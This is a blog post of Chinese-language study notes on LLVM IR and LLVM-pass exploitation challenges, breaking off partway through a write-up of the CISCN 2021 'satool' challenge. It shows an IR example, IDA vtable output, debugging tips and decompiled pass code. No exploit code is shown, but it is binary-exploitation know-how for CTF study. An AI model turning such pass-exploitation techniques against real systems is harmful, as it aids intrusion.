



<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="我他喵的" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="我他喵的" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="我他喵的" href="http://example.com/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="Learning" />


<link rel="canonical" href="http://example.com/2022/06/11/vm%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">



  <title>
vm学习笔记 |
dreamcat = 我他喵的</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">vm学习笔记
  </h1>
  
<div class="meta">
  <span class="item" title="Created: 2022-06-11 19:28:16">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">Posted on</span>
    <time itemprop="dateCreated datePublished" datetime="2022-06-11T19:28:16+08:00">2022-06-11</time>
  </span>
  <span class="item" title="Symbols count in article">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">Symbols count in article</span>
    <span>19k</span>
    <span class="text">words</span>
  </span>
  <span class="item" title="Reading time">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">Reading time</span>
    <span>17 mins.</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="Toggle navigation bar">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">dreamcat</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gicliierfjj20zk0m8npd.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipetv6p75j20zk0m8x6p.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipevuctzzj20zk0m84qp.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipevo9j1jj20zk0m8e81.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipey0a334j20zk0m8qpt.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclga70tsj20zk0m84mr.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">Home</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="en">
  <link itemprop="mainEntityOfPage" href="http://example.com/2022/06/11/vm%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="dreamcat">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="我他喵的">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="vmlearning-笔记"><a class="markdownIt-Anchor" href="#vmlearning-笔记">#</a> vmlearning 笔记</h1>
<p>首先清楚什么是 vm，虚拟机器，一种实现不同架构的程序的解释性的软件程序。virtual machine</p>
<p>关于 vmpass 这种解释性的程序，工作原理是根据不同的 cou 架构，不同的程序会生成不同的机器语言代码，指令代码。这个中间文件称作 IR，一般有两种形式 ——bitcode, 二进制机器码，以及.ll 文件，后者是为了方便我们阅读的，可读性较高。</p>
<p>vmpass 程序，对于我们提供的想要模拟运行的代码，我们需要提供类似于指令代码程序的文件，.ll 或者 bc 文件，而文件是被 assmebly 后的，所以里面会有相关的汇编指令（机器代码指令）的二进制代码。那么我们知道对于一台机器，其所能实现的操作是固定的，不同的编程语言，程序，最终都会被解释为一条条的机器指令，利用组成原理的知识，一条机器指令代码，需要有操作码以及操作数，有的时候需要寄存器，而且程序的运行必然会利用到一些判断标志，c,z 等等。这些都会被形象的存储在数组中。比如寄存器数组就会对应不同的寄存器，里面记录数据，提供’cpu’使用。而字符串也会被拆开，每个字符变为 16 进制数储存。（小端序，倒着看的字符串）</p>
<p>0x72306F446B633442LL  ===&gt;&gt; ‘r0oDkc4B’   ===&gt;&gt;“B4ckD0or”</p>
<p>关于 vm 的机制，后面再慢慢学习。</p>
<h2 id="ir代码"><a class="markdownIt-Anchor" href="#ir代码">#</a> IR 代码</h2>
<p><span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3MjA2MTA1L2FydGljbGUvZGV0YWlscy8xMTUyNzQyNDE/b3BzX3JlcXVlc3RfbWlzYz0lMjU3QiUyNTIycmVxdWVzdCUyNTVGaWQlMjUyMiUyNTNBJTI1MjIxNjU0OTYwODk0MTY3ODE2ODM5MjIwNzclMjUyMiUyNTJDJTI1MjJzY20lMjUyMiUyNTNBJTI1MjIyMDE0MDcxMy4xMzAxMDIzMzQucGMlMjU1RmFsbC4lMjUyMiUyNTdEJmFtcDtyZXF1ZXN0X2lkPTE2NTQ5NjA4OTQxNjc4MTY4MzkyMjA3NyZhbXA7Yml6X2lkPTAmYW1wO3V0bV9tZWRpdW09ZGlzdHJpYnV0ZS5wY19zZWFyY2hfcmVzdWx0Lm5vbmUtdGFzay1ibG9nLTJ+YWxsfmZpcnN0X3JhbmtfZWNwbV92MX5yYW5rX3YzMV9lY3BtLTEtMTE1Mjc0MjQxLW51bGwtbnVsbC4xNDIlNUV2MTMlNUVjb250cm9sLDE1NyU1RXYxNCU1RWNvbnRyb2wmYW1wO3V0bV90ZXJtPUlSJUU1JUI4JUI4JUU4JUE3JTgxJUU3JTlBJTg0JUU2JTkzJThEJUU0JUJEJTlDJUU2JThDJTg3JUU0JUJCJUE0JmFtcDtzcG09MTAxOC4yMjI2LjMwMDEuNDE4Nw==">参考资料</span></p>
<p>IR 是一种中间产物，看了一理解位是对程序代码的指令化解析，而且适用于我们可以看懂的，可以理解位 llvm 下的汇编代码。bitcode 是纯二进制代码文件。</p>
<p>简单的学习下</p>
<p>源代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="type">int</span> a= <span class="number">2</span>;</span><br><span class="line">	<span class="type">int</span> b=<span class="number">3</span>;</span><br><span class="line">	<span class="type">int</span> c = a;</span><br><span class="line">	<span class="type">int</span> d=<span class="number">1</span>+a;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>IR 代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">; ModuleID = <span class="string">&#x27;test.c&#x27;</span></span><br><span class="line">source_filename = <span class="string">&quot;test.c&quot;</span></span><br><span class="line">target datalayout = <span class="string">&quot;e-m:e-i64:64-f80:128-n8:16:32:64-S128&quot;</span></span><br><span class="line">target triple = <span class="string">&quot;x86_64-pc-linux-gnu&quot;</span></span><br><span class="line"></span><br><span class="line">; Function Attrs: noinline nounwind optnone uwtable</span><br><span class="line">define i32 @main() <span class="comment">#0 &#123;</span></span><br><span class="line">  %<span class="number">1</span> = alloca i32, align <span class="number">4</span></span><br><span class="line">  %<span class="number">2</span> = alloca i32, align <span class="number">4</span></span><br><span class="line">  %<span class="number">3</span> = alloca i32, align <span class="number">4</span></span><br><span class="line">  %<span class="number">4</span> = alloca i32, align <span class="number">4</span></span><br><span class="line">  store i32 <span class="number">2</span>, i32* %<span class="number">1</span>, align <span class="number">4</span></span><br><span class="line">  store i32 <span class="number">3</span>, i32* %<span class="number">2</span>, align <span class="number">4</span></span><br><span class="line">  %<span class="number">5</span> = load i32, i32* %<span class="number">1</span>, align <span class="number">4</span></span><br><span class="line">  store i32 %<span class="number">5</span>, i32* %<span class="number">3</span>, align <span class="number">4</span></span><br><span class="line">  %<span class="number">6</span> = load i32, i32* %<span class="number">1</span>, align <span class="number">4</span></span><br><span class="line">  %<span class="number">7</span> = add nsw i32 <span class="number">1</span>, %<span class="number">6</span></span><br><span class="line">  store i32 %<span class="number">7</span>, i32* %<span class="number">4</span>, align <span class="number">4</span></span><br><span class="line">  ret i32 <span class="number">0</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">attributes <span class="comment">#0 = &#123; noinline nounwind optnone uwtable &quot;correctly-rounded-divide-sqrt-fp-math&quot;=&quot;false&quot; &quot;disable-tail-calls&quot;=&quot;false&quot; &quot;less-precise-fpmad&quot;=&quot;false&quot; &quot;no-frame-pointer-elim&quot;=&quot;true&quot; &quot;no-frame-pointer-elim-non-leaf&quot; &quot;no-infs-fp-math&quot;=&quot;false&quot; &quot;no-jump-tables&quot;=&quot;false&quot; &quot;no-nans-fp-math&quot;=&quot;false&quot; &quot;no-signed-zeros-fp-math&quot;=&quot;false&quot; &quot;no-trapping-math&quot;=&quot;false&quot; &quot;stack-protector-buffer-size&quot;=&quot;8&quot; &quot;target-cpu&quot;=&quot;x86-64&quot; &quot;target-features&quot;=&quot;+fxsr,+mmx,+sse,+sse2,+x87&quot; &quot;unsafe-fp-math&quot;=&quot;false&quot; &quot;use-soft-float&quot;=&quot;false&quot; &#125;</span></span><br><span class="line"></span><br><span class="line">!llvm.module.flags = !&#123;!<span class="number">0</span>&#125;</span><br><span class="line">!llvm.ident = !&#123;!<span class="number">1</span>&#125;</span><br><span class="line"></span><br><span class="line">!<span class="number">0</span> = !&#123;i32 <span class="number">1</span>, !<span class="string">&quot;wchar_size&quot;</span>, i32 <span class="number">4</span>&#125;</span><br><span class="line">!<span class="number">1</span> = !&#123;!<span class="string">&quot;clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)&quot;</span>&#125;</span><br></pre></td></tr></table></figure>
<p>我们重点关注函数部分。开头是文件的一些信息，文件名，类型，等等。</p>
<p>函数，define 定义一个函数，接着 i32 表示函数的返回值是 32 位的（这里我们定义的是 int）。alloca 大概就是谁年轻一个变量的空间。变量用数字做标识，按照先后顺序。% 加上一个数字就表示的是第几个变量，同样的 i32 说明变量是 32 位。align 则是说明变量在内存中 4 字节对齐。</p>
<p>我们知道函数名在程序内存中是一个全局的符号，我们如何表示？@用于表示全局的标识，包括函数名以及全局变量。特别说明，区别函数与变量的方法是二者的定义形式不一样。函数使用 define 关键字。</p>
<p>% 除了用于标识局部变量还用于标识寄存器。</p>
<p>（后续继续补充）</p>
<p>** 关于是否需要完全掌握 IR，其实还是需要根据本题目，有的题目需要对 IR 进行优化，从而达到对源代码程序的优化。</p>
<p>​			有的题目和 IR 代码高度相关的那就得看懂吧！													——ayaka</p>
<h2 id="ctf"><a class="markdownIt-Anchor" href="#ctf">#</a> ctf</h2>
<p>直接进入解题，vmpass 提供用户一整套完整的流程，包括库，vmpass 基于 c++ 编写。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;llvm/Pass.h&quot;</span><span class="comment">//写Pass所必须的库</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;llvm/IR/Function.h&quot;</span><span class="comment">//操作函数所必须的库</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;llvm/Support/raw_ostream.h&quot;</span><span class="comment">//打印输出所必须的库</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;llvm/IR/LegacyPassManager.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;llvm/Transforms/IPO/PassManagerBuilder.h&quot;</span></span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>程序中我们需要注册一些相关的内容，opt 操作，以及 clang 所需要的对象。</p>
<h2 id="ciscn2021-satool"><a class="markdownIt-Anchor" href="#ciscn2021-satool">#</a> ciscn2021 satool</h2>
<p>一般来说 LLVM PASS pwn 都是对函数进行 PASS 操作，所以我们首先要找到 runOnFunction 函数时如何重写的，一般来说 runOnFunction 都会在函数表最下面。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D20                 ;org <span class="number">203</span>D20h</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D20 ; `vtable <span class="keyword">for</span><span class="number">&#x27;</span>`anonymous namespace<span class="number">&#x27;</span>::SAPass</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D20 _ZTVN12_GLOBAL__N_16SAPassE dq <span class="number">0</span>        ; offset to this</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D28                 dq offset _ZTIN12_GLOBAL__N_16SAPassE ; `typeinfo <span class="keyword">for</span><span class="number">&#x27;</span>`anonymous namespace<span class="number">&#x27;</span>::SAPass</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D30 off_203D30      dq offset _ZN4llvm4PassD2Ev</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D30                                         ; DATA XREF: sub_1930+<span class="number">32</span>↑o</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D30                                         ; llvm::Pass::~Pass()</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D38                 dq offset sub_1990</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D40                 dq offset _ZNK4llvm4Pass11getPassNameEv ; llvm::Pass::getPassName(<span class="type">void</span>)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D48                 dq offset _ZN4llvm4Pass16doInitializationERNS_6ModuleE ; llvm::Pass::doInitialization(llvm::Module &amp;)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D50                 dq offset _ZN4llvm4Pass14doFinalizationERNS_6ModuleE ; llvm::Pass::doFinalization(llvm::Module &amp;)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D58                 dq offset _ZNK4llvm4Pass5printERNS_11raw_ostreamEPKNS_6ModuleE ; llvm::Pass::print(llvm::raw_ostream &amp;,llvm::Module <span class="type">const</span>*)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D60                 dq offset _ZNK4llvm12FunctionPass17createPrinterPassERNS_11raw_ostreamERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE ; llvm::FunctionPass::createPrinterPass(llvm::raw_ostream &amp;,<span class="built_in">std</span>::__cxx11::basic_string&lt;<span class="type">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="type">char</span>&gt;,<span class="built_in">std</span>::allocator&lt;<span class="type">char</span>&gt;&gt; <span class="type">const</span>&amp;)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D68                 dq offset _ZN4llvm12FunctionPass17assignPassManagerERNS_7PMStackENS_15PassManagerTypeE ; llvm::FunctionPass::assignPassManager(llvm::PMStack &amp;,llvm::PassManagerType)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D70                 dq offset _ZN4llvm4Pass18preparePassManagerERNS_7PMStackE ; llvm::Pass::preparePassManager(llvm::PMStack &amp;)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D78                 dq offset _ZNK4llvm12FunctionPass27getPotentialPassManagerTypeEv ; llvm::FunctionPass::getPotentialPassManagerType(<span class="type">void</span>)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D80                 dq offset _ZNK4llvm4Pass16getAnalysisUsageERNS_13AnalysisUsageE ; llvm::Pass::getAnalysisUsage(llvm::AnalysisUsage &amp;)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D88                 dq offset _ZN4llvm4Pass13releaseMemoryEv ; llvm::Pass::releaseMemory(<span class="type">void</span>)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D90                 dq offset _ZN4llvm4Pass26getAdjustedAnalysisPointerEPKv ; llvm::Pass::getAdjustedAnalysisPointer(<span class="type">void</span> <span class="type">const</span>*)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>D98                 dq offset _ZN4llvm4Pass18getAsImmutablePassEv ; llvm::Pass::getAsImmutablePass(<span class="type">void</span>)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>DA0                 dq offset _ZN4llvm4Pass18getAsPMDataManagerEv ; llvm::Pass::getAsPMDataManager(<span class="type">void</span>)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>DA8                 dq offset _ZNK4llvm4Pass14verifyAnalysisEv ; llvm::Pass::verifyAnalysis(<span class="type">void</span>)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>DB0                 dq offset _ZN4llvm4Pass17dumpPassStructureEj ; llvm::Pass::dumpPassStructure(uint)</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>DB8                 dq offset runonfunction		<span class="comment">//这里我进行了重命名</span></span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>DC0 ; public `anonymous namespace<span class="number">&#x27;</span>::SAPass</span><br><span class="line">.data.rel.ro:<span class="number">0000000000203</span>DC0 ; `typeinfo <span class="keyword">for</span><span class="number">&#x27;</span>`anonymous namespace<span class="number">&#x27;</span>::SAPass</span><br></pre></td></tr></table></figure>
<p>再程序的开始 start 会有一些函数名注册，一般不需要搭理。我们重点关注的还是程序如何解释运行程序 ——runOnFunction</p>
<p>函数里面最开始一定是 getname, 这个就是获取函数名称的，没有什么意义。</p>
<p>如何调试？</p>
<p>_一般情况下，题目会指定使用的 opt 加载，或者给出，这道题使用的 opt-8，对应的是 llvm-8。要提一句的是，不同的题目需要的 llvm 版本不同，需要切换，ubuntu18 最高支持的是 llvm-10。接着，我们如何确定断点？我们分析的是 pass.so 的文件，所以如果想断点，就是 offset+vmpass.so 的第一个地址。_但是程序并不是一开始就会加载 pass.so，但是地址应该是有相对固定的偏移，距离 libtinfo.so.5.9 偏移是固定的，就是其低 2 字节。解决办法，利用 compare 函数来定位，compare 会先比较 B4ckD0or，<span class="exturl" data-url="aHR0cDovL3huLS1wYXNzLWtmNWY0c2UyZzU3Z3ozems2ZDN4MWE5ZTJlYmwzYnViYi5zbw==">这个时候就已经加载了 pass.so</span>。</p>
<p>回到题目，llvmpass pwn 的一个非常重要的电视，因为属于软件思想模拟一个 cpu 架构，所以每次对于我们提供的代码的操作都是种循环。而且因为是 c++ 编写的 so 库，往往会有很多不重要的检查，这些往往是很好辨认的，</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br></pre></td><td class="code"><pre><span class="line">        <span class="keyword">if</span> ( !(<span class="type">unsigned</span> <span class="type">int</span>)<span class="built_in">std</span>::__cxx11::basic_string&lt;<span class="type">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="type">char</span>&gt;,<span class="built_in">std</span>::allocator&lt;<span class="type">char</span>&gt;&gt;::compare(</span><br><span class="line">                              &amp;v89,</span><br><span class="line">                              <span class="string">&quot;save&quot;</span>) )</span><br><span class="line">        &#123;</span><br><span class="line">          v17 = *((_BYTE *)v8 + <span class="number">16</span>);</span><br><span class="line">          <span class="keyword">if</span> ( v17 == <span class="number">79</span> )</span><br><span class="line">          &#123;</span><br><span class="line">            v18 = <span class="number">0LL</span>;</span><br><span class="line">          &#125;</span><br><span class="line">          <span class="keyword">else</span></span><br><span class="line">          &#123;</span><br><span class="line">            <span class="keyword">if</span> ( v17 != <span class="number">29</span> )</span><br><span class="line">            &#123;</span><br><span class="line">              llvm::llvm_unreachable_internal(</span><br><span class="line">                (llvm *)<span class="string">&quot;Invalid opcode!&quot;</span>,</span><br><span class="line">                <span class="string">&quot;/usr/include/llvm/IR/InstrTypes.h&quot;</span>,</span><br><span class="line">                (<span class="type">const</span> <span class="type">char</span> *)&amp;stru_400.st_value + <span class="number">5</span>,</span><br><span class="line">                v16);</span><br><span class="line">LABEL_139:</span><br><span class="line">              llvm::llvm_unreachable_internal(</span><br><span class="line">                (llvm *)<span class="string">&quot;Invalid opcode!&quot;</span>,</span><br><span class="line">                <span class="string">&quot;/usr/include/llvm/IR/InstrTypes.h&quot;</span>,</span><br><span class="line">                (<span class="type">const</span> <span class="type">char</span> *)&amp;stru_400.st_value + <span class="number">5</span>,</span><br><span class="line">                v36);</span><br><span class="line">LABEL_140:</span><br><span class="line">              llvm::llvm_unreachable_internal(</span><br><span class="line">                (llvm *)<span class="string">&quot;Invalid opcode!&quot;</span>,</span><br><span class="line">                <span class="string">&quot;/usr/include/llvm/IR/InstrTypes.h&quot;</span>,</span><br><span class="line">                (<span class="type">const</span> <span class="type">char</span> *)&amp;stru_400.st_value + <span class="number">5</span>,</span><br><span class="line">                v63);</span><br><span class="line">LABEL_141:</span><br><span class="line">              llvm::llvm_unreachable_internal(</span><br><span class="line">                (llvm *)<span class="string">&quot;Invalid opcode!&quot;</span>,</span><br><span class="line">                <span class="string">&quot;/usr/include/llvm/IR/InstrTypes.h&quot;</span>,</span><br><span class="line">                (<span class="type">const</span> <span class="type">char</span> *)&amp;stru_400.st_value + <span class="number">5</span>,</span><br><span class="line">                v67);</span><br><span class="line">LABEL_142:</span><br><span class="line">              llvm::llvm_unreachable_internal(</span><br><span class="line">                (llvm *)<span class="string">&quot;Invalid opcode!&quot;</span>,</span><br><span class="line">                <span class="string">&quot;/usr/include/llvm/IR/InstrTypes.h&quot;</span>,</span><br><span class="line">                (<span class="type">const</span> <span class="type">char</span> *)&amp;stru_400.st_value + <span class="number">5</span>,</span><br><span class="line">                v78);</span><br><span class="line">LABEL_143:</span><br><span class="line">              llvm::llvm_unreachable_internal(</span><br><span class="line">                (llvm *)<span class="string">&quot;Invalid opcode!&quot;</span>,</span><br><span class="line">                <span class="string">&quot;/usr/include/llvm/IR/InstrTypes.h&quot;</span>,</span><br><span class="line">                (<span class="type">const</span> <span class="type">char</span> *)&amp;stru_400.st_value + <span class="number">5</span>,</span><br><span class="line">                (<span class="type">unsigned</span> <span class="type">int</span>)v20);</span><br><span class="line">LABEL_144:</span><br><span class="line">              llvm::llvm_unreachable_internal(</span><br><span class="line">                (llvm *)<span class="string">&quot;Invalid opcode!&quot;</span>,</span><br><span class="line">                <span class="string">&quot;/usr/include/llvm/IR/InstrTypes.h&quot;</span>,</span><br><span class="line">                (<span class="type">const</span> <span class="type">char</span> *)&amp;stru_400.st_value + <span class="number">5</span>,</span><br><span class="line">                (<span class="type">unsigned</span> <span class="type">int</span>)v24);</span><br><span class="line">LABEL_154:</span><br><span class="line">              __assert_fail(</span><br><span class="line">                <span class="string">&quot;i &lt; getNumArgOperands() &amp;&amp; \&quot;Out of bounds!\&quot;&quot;</span>,</span><br><span class="line">                <span class="string">&quot;/usr/include/llvm/IR/InstrTypes.h&quot;</span>,</span><br><span class="line">                <span class="number">0x470</span>u,</span><br><span class="line">                <span class="string">&quot;llvm::Value *llvm::CallBase::getArgOperand(unsigned int) const&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            v18 = <span class="number">-2LL</span>;</span><br><span class="line">          &#125;</span><br><span class="line">          v19 = llvm::CallBase::getNumTotalBundleOperands((llvm::CallBase *)(v6 - <span class="number">3</span>));</span><br><span class="line">          v20 = (<span class="type">char</span> *)&amp;v8[<span class="number">-3</span> * (*((_DWORD *)v8 + <span class="number">5</span>) &amp; <span class="number">0xFFFFFFF</span>)];</span><br><span class="line">          <span class="keyword">if</span> ( <span class="number">-1431655765</span> * (<span class="type">unsigned</span> <span class="type">int</span>)((<span class="type">unsigned</span> __int64)((<span class="type">char</span> 